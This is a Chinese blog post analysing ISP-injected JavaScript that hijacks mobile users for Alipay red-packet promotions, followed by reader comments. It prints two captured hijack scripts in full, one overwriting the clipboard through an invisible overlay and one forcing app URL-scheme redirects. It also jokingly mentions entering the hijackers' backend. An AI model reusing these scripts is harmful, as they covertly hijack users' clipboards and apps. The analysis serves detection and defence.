反运营商劫持系统上线半年,期间分析过一些典型的劫持案例,由于最近支付宝红包相关的劫持事件越来越多,于是深入研究了下,发现不少有趣的网站。
整理了部分笔记,作为运营商劫持系列的第一篇文章蹭蹭热点。
拳打剪贴板
先看看比较简单的劫持代码:
(function(){var h = document.getElementsByTagName('head')[0];var a = document.createElement('script');a.src = 'http://xxxx.b0.upaiyun.com/xxxx.js';a.onload = function(){document.body.insertAdjacentHTML("beforeEnd", '<div id="__btn_" style="position:absolute;filter:alpha(opacity=0);opacity:0;-moz-opacity:0;left:0;top:0;background:#CDEAF6;width:' + document.documentElement.clientWidth + 'px;height:' + document.documentElement.clientHeight + 'px;z-index:233333" data-clipboard-text="快来领取支付宝跨年红包!1月1日起还有机会额外获得专享红包哦!复制此消息,打开最新版支付宝就能领取!xxxxxxxx"></div>');var btn = document.getElementById('__btn_');var clipboard = new Clipboard(btn);clipboard.on('success', function(e) {var b = document.getElementById('__btn_');b.parentNode.removeChild(b);});clipboard.on('error', function(e) {var b = document.getElementById('__btn_');b.parentNode.removeChild(b);});};if (h) {h.appendChild(a);}})();
这段代码的功能很明显是覆盖剪贴板内容为支付宝红包码。
值得注意的是,劫持的 JS 是托管在又拍云下的,一定程度上可以绕过某些检查机制。
比如刚开始我准备把各大 CDN 的子域名都加进白名单,后来发现不少恶意 JS 都放在 CDN 上。
还有些劫持链接类似 https://baidustatic.com.xxx.com/js/jquery.min.js,检查域名后缀或字符串是否存在都是不靠谱的。
脚踢 Scheme
然后是一段高端点的劫持代码:
var schemas = ["alipays://platformapi/startapp?saId=10000007&qrcode=xxxxxx","baiduboxapp://utils?action=sendIntent¶ms=xxxx","iqiyi://mobile/home?ftype=xxxx","mogujie://open?url=https%3A%2F%2Fact.mogujie.com%2Fxxxxxx","sinaweibo://pageinfo?containerid=xxxxx"];function openschema(index) {var l = document.createElement("a");l.href = schemas[index];l.style.display = "none";document.body.appendChild(l);l.click();document.removeEventListener("touchend", openschema, false);setCookie("hasup"+index, "up", 1);}function setCookie(name, value, Days) {if (Days == null || Days == '') {Days = 1;}var exp = new Date();exp.setTime(exp.getTime() + Days * 12 * 60 * 60 * 1000);document.cookie = name + "=" + escape(value) + "; path=/;expires=" + exp.toGMTString();}function getCookie(name) {var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");if (arr = document.cookie.match(reg))return unescape(arr[2]);elsereturn null;};(function (a, d, b, e) {if (/ios|ipad|iphone|itouch|android|linux/i.test(d.userAgent)) {var round = Math.round(Math.random() * (schemas.length - 1));foo(getCookie("hasup"+round), round);}function foo(val, index) {if (val == null) {if (/android|linux/i.test(d.userAgent)) {try {var c = b.createElement("iframe");c.src = a[index];c.style.display = "none";b.body.appendChild(c);b.addEventListener("touchend", openschema(index), false);} catch (g) {}} else {try {e.replace(a[index])} catch (g) {try {e.href = a[index]} catch (h) {}}setCookie("hasup" + index, "up", 1);}}};})(schemas, navigator, document, window.location);
直接调用手机 APP 的 URL Scheme,达到的效果就是自动跳转到支付宝领红包,或是打开其他应用里的推广。
(说起来前不久的应用克隆漏洞用支付宝做演示,其中的一环也是利用 URL Scheme 接触到 File 域)
数据管理系统
在分析一个混淆后的 JS 劫持文件时发现了个神秘的网站:
进入后台,在库管理功能中有针对不同地区运营商的配置:
以某市移动为例:
其关键字实际为淘宝的口令:
而 custom 的配置里关键字很明显是支付宝红包码:
进一步研究发现,该劫持系统与多个劫持域名有关,单配置每日劫持量就有数百万。
其劫持代码可根据不同用户的后台配置作出不同的劫持行为,可谓非常先进了。
(如果把红包码换成自己的是不是能日入上万 XD)
最后,对于某些名曰流量优化实际上与运营商狼狈为奸的「互联网信息技术公司」表示遗憾。
老哥,你这后台说进就进啊
因为骚啊
在上面看到进入后台四个字,笑尿,看到你这个评论我直接笑喷
你好,我这里第二种劫持非常泛滥,有什么解决的办法吗
方法一:如果你有在用 ShadowRocket 之类的软件,找到劫持的域名,加到 Reject 规则里。
方法二:抓包,截图搜集证据,去工信部投诉。
emmm这后台ui还不错啊